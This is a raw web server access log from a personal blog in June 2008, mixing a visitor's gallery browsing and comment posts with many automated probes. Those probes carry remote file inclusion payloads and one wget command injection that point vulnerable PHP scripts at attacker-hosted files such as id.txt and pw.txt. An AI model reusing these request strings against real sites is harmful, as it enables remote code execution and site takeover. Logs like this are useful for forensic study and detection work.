193.201.218.158 - - [08/Jun/2008:09:30:37 -0700] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=wget%20http://hrpc.net/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.201.218.158 - - [08/Jun/2008:09:30:40 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=wget%20http://hrpc.net/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.201.218.158 - - [08/Jun/2008:09:30:46 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=wget%20http://hrpc.net/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:48 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0143.jpg HTTP/1.1" 200 332772 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:31:03 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0177.jpg HTTP/1.1" 200 348079 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:31:11 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0075.jpg HTTP/1.1" 200 372101 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
213.203.222.50 - - [08/Jun/2008:09:31:11 -0700] "GET /logs//calendar.php?p=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:09:31:12 -0700] "GET //calendar.php?p=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:31:17 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0142.jpg HTTP/1.1" 200 309100 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:31:26 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0102.jpg HTTP/1.1" 200 477043 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:31:31 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0160.jpg HTTP/1.1" 200 386726 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
69.57.142.40 - - [08/Jun/2008:09:31:36 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:09:31:36 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:31:41 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0127.jpg HTTP/1.1" 200 426309 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
84.19.188.13 - - [08/Jun/2008:09:31:45 -0700] "GET /logs/access_080118.log//include/bbs.lib.inc.php?site_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [08/Jun/2008:09:31:45 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [08/Jun/2008:09:31:46 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:31:46 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0164.jpg HTTP/1.1" 200 386584 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
84.19.188.13 - - [08/Jun/2008:09:31:47 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:32:00 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0146.jpg HTTP/1.1" 200 344149 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
195.69.95.221 - - [08/Jun/2008:09:32:05 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.63" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:32:15 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0175.jpg HTTP/1.1" 200 327600 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
74.52.177.153 - - [08/Jun/2008:09:32:19 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://linuxsolutions.co.ug/linux/cache/vuln.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.177.153 - - [08/Jun/2008:09:32:20 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://linuxsolutions.co.ug/linux/cache/vuln.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.177.153 - - [08/Jun/2008:09:32:20 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://linuxsolutions.co.ug/linux/cache/vuln.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:32:20 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0091.jpg HTTP/1.1" 200 528876 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
209.62.26.18 - - [08/Jun/2008:09:32:26 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.79" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:32:29 -0700] "GET /logs/access_080114.log//myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:32:29 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0150.jpg HTTP/1.1" 200 378254 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:32:29 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:32:30 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:32:35 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0126.jpg HTTP/1.1" 200 401657 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
62.128.131.80 - - [08/Jun/2008:09:32:35 -0700] "GET /logs/index1.php?site=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:09:32:35 -0700] "GET /index1.php?site=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:32:44 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0158.jpg HTTP/1.1" 200 306017 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:32:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0086.jpg HTTP/1.1" 200 531628 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
202.221.143.111 - - [08/Jun/2008:09:32:50 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:32:52 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0159.jpg HTTP/1.1" 200 381231 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:33:02 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0161.jpg HTTP/1.1" 200 448957 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:33:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0089.jpg HTTP/1.1" 200 496294 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:33:07 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0163.jpg HTTP/1.1" 200 346344 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:33:09 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:33:09 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:33:15 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0165.jpg HTTP/1.1" 200 364141 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
217.20.163.130 - - [08/Jun/2008:09:33:17 -0700] "GET //playing.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.20.163.130 - - [08/Jun/2008:09:33:17 -0700] "GET //playing.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:33:22 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0068.jpg HTTP/1.1" 200 386583 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:33:29 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0173.jpg HTTP/1.1" 200 357822 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:33:43 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.1" 200 8517 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:33:44 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:33:44 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&709 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:33:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0136_0.jpg HTTP/1.1" 200 329003 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
212.227.251.172 - - [08/Jun/2008:09:34:03 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:34:11 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0174.jpg HTTP/1.1" 200 310022 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
195.69.95.221 - - [08/Jun/2008:09:34:16 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
195.69.95.221 - - [08/Jun/2008:09:34:17 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:09:34:20 -0700] "GET /logs/access_080113.log/errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:09:34:21 -0700] "GET /errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:09:34:21 -0700] "GET /logs/errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:34:25 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0154.jpg HTTP/1.1" 200 344712 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
66.6.223.160 - - [08/Jun/2008:09:34:28 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [08/Jun/2008:09:34:28 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.66.182 - - [08/Jun/2008:09:34:36 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.182 - - [08/Jun/2008:09:34:36 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:34:39 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0157.jpg HTTP/1.1" 200 311163 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
72.55.179.18 - - [08/Jun/2008:09:35:00 -0700] "GET /logs/access_080122.log/errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:09:35:12 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:09:35:12 -0700] "GET /modifyform.html?code=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:09:35:12 -0700] "GET /logs/modifyform.html?code=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [08/Jun/2008:09:35:16 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:35:18 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0138_0.jpg HTTP/1.1" 200 386052 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:35:30 -0700] "POST /blog/wp-comments-post.php HTTP/1.1" 500 517 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
66.249.67.79 - - [08/Jun/2008:09:35:33 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=slide HTTP/1.1" 200 8517 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:35:36 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&930 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
217.20.163.130 - - [08/Jun/2008:09:35:37 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:35:38 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 262144 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
64.90.163.98 - - [08/Jun/2008:09:35:39 -0700] "GET /logs/access_080106.log//errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:35:44 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=1&254 HTTP/1.1" 200 19014 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
217.20.163.130 - - [08/Jun/2008:09:35:45 -0700] "GET /logs/access.log/index.php?pagina=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:35:45 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&548 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:35:48 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0111.jpg HTTP/1.1" 200 377705 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:35:51 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&962 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
90.158.114.6 - - [08/Jun/2008:09:35:52 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.800" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:35:53 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0167.jpg HTTP/1.1" 200 399577 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
90.158.114.6 - - [08/Jun/2008:09:35:53 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.38.4.3 - - [08/Jun/2008:09:35:53 -0700] "GET //errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [08/Jun/2008:09:35:53 -0700] "GET /logs/access.log//errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [08/Jun/2008:09:35:53 -0700] "GET /logs//errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.90.163.98 - - [08/Jun/2008:09:35:57 -0700] "GET /logs/access_071225.log//errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:09:35:58 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:09:35:58 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.163.130 - - [08/Jun/2008:09:36:02 -0700] "GET //playing.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:03 -0700] "POST /blog/wp-comments-post.php HTTP/1.1" 500 517 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:09 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&380 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:18 -0700] "POST /blog/wp-comments-post.php HTTP/1.1" 302 17 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
217.20.163.130 - - [08/Jun/2008:09:36:18 -0700] "GET //playing.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:22 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0169.jpg HTTP/1.1" 200 387384 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:29 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.1" 200 9410 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:36:30 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&545 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
